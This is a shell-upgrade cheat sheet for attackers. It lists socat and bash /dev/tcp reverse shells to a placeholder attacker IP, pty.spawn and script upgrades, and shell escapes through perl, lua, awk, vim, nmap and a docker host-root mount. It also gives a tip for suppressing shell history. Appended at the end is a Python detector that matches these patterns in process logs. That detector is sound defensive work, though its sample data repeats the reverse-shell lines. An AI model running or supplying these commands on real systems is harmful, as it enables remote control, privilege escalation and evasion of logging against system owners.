Spawn TTY Shells
🔧 Python Methods
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
You can also use:
python -c 'import os; os.system("/bin/bash")'
🐍 Socat Methods (from attacker and victim)
On attacker (listener):
socat file:`tty`,raw,echo=0 tcp-listen:4444
On victim (reverse shell):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ATTACKER_IP>:4444
🦀 Script Method (if available on the system)
script /dev/null -c bash
🧠 Regaining Full Terminal Control
Suspend the shell with
Ctrl + Z
On the attacker host:
stty raw -echo; fg
Then press Enter and run reset; if asked for the terminal type, answer xterm.
📦 Ensuring Terminal Configuration
echo $TERM # Verify terminal type
export TERM=xterm # Set terminal type if needed
export SHELL=/bin/bash # Force bash if possible
🖼 Adjusting Window Size (prevents errors when using programs like nano, htop, etc.)
On the attacker host:
stty size # Example output: 30 127
On the remote shell:
stty rows 30 columns 127
📟 /dev/tcp and Bash Method (interactive reverse shell)
bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1
Once connected, you can upgrade the shell with stty (explained below).
🐚 Shell Upgrade with System Commands (stty and export)
Once you use any of the above methods (like python -c 'pty.spawn(...)'), you can further improve it with:
CTRL+Z # Pause the shell and return to your local terminal
stty raw -echo; fg
Then, type:
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <num> # Adjust size if needed
🧬 With Perl
perl -e 'exec "/bin/bash";'
Or after starting a new session with POSIX::setsid():
perl -e 'use POSIX; POSIX::setsid(); exec "/bin/bash";'
☕ With Java
If Runtime.exec() is accessible:
Runtime.getRuntime().exec("/bin/bash");
(Generally not very useful manually, but useful in Java app exploitation).
🦥 With Lua
lua -e "os.execute('/bin/bash')"
🧱 With Awk
awk 'BEGIN {system("/bin/bash")}'
🧪 With Tcl
tclsh
exec /bin/bash <@stdin >@stdout 2>@stderr
🧞‍♂️ With vi or vim (command mode)
vim
:!bash
Or:
vim -c ':!bash'
🖋️ With nmap (if it has scripting with --interactive)
nmap --interactive
!sh
💾 With Docker / Chroot / chsh if you have permissions
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Or if you can change your shell:
chsh -s /bin/bash
🧠 Useful Tips
If the shell has no colour support, or you do not want a history file written, export:
export TERM=xterm-256color
export HISTFILE=/dev/null
To check if a TTY is assigned:
tty
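As an added defender-side example (not part of the original cheat sheet), the following Python flags the TTY-upgrade patterns listed on this page in process-execution records. The records, IPs and the (pid, parent comm, cmdline) layout are constructed assumptions; a real feed would be auditd EXECVE records or an EDR process stream.

```python
import re
from typing import List, Set, Tuple

# Constructed process-exec records: (pid, parent comm, cmdline).
# What lands in cmdline depends on the sensor; the /dev/tcp line assumes
# the full `bash -c` string was captured.
SAMPLE_EVENTS = [
    (4101, "nc",    "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"),
    (4102, "socat", "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.5:4444"),
    (4103, "sh",    "script /dev/null -c bash"),
    (4104, "bash",  "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"),
    (4105, "vim",   "bash"),        # child of vim, i.e. :!bash
    (4106, "tclsh", "/bin/bash"),   # child of tclsh, i.e. exec /bin/bash
    (4107, "bash",  "stty rows 30 columns 127"),
    (4108, "sshd",  "python3 manage.py migrate"),   # benign
    (4109, "bash",  "ls -la /var/log"),             # benign
]

# Each rule: name, regex over cmdline, and an optional set of parent names.
# When the set is non-empty the rule only fires under one of those parents,
# so a plain shell spawn from bash or sshd is not flagged.
RULES: List[Tuple[str, "re.Pattern[str]", Set[str]]] = [
    ("pty_spawn_python",   re.compile(r"\bpty\.spawn\("), set()),
    ("socat_pty_reverse",  re.compile(r"\bsocat\b.*\bexec:.*\bpty\b.*\btcp:"), set()),
    ("script_pty_upgrade", re.compile(r"\bscript\b.*/dev/null.*-c\s+\S*sh\b"), set()),
    ("dev_tcp_reverse",    re.compile(r"/dev/tcp/\d+\.\d+\.\d+\.\d+/\d+"), set()),
    ("stty_tty_tuning",    re.compile(r"\bstty\b.*\brows\s+\d+.*\bcolumns\s+\d+"), set()),
    ("shell_from_unusual_parent", re.compile(r"^(/bin/|/usr/bin/)?(ba)?sh\b"),
     {"vim", "vi", "tclsh", "perl", "lua", "awk", "nmap", "java"}),
]

def classify(parent: str, cmdline: str) -> List[str]:
    """Return the names of every rule that matches one exec record."""
    hits = []
    for name, pattern, parents in RULES:
        if pattern.search(cmdline) and (not parents or parent in parents):
            hits.append(name)
    return hits

def scan(events) -> List[Tuple[int, str]]:
    """Scan (pid, parent, cmdline) records; return (pid, rule) for each hit."""
    return [(pid, rule) for pid, parent, cmd in events for rule in classify(parent, cmd)]

if __name__ == "__main__":
    for pid, rule in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```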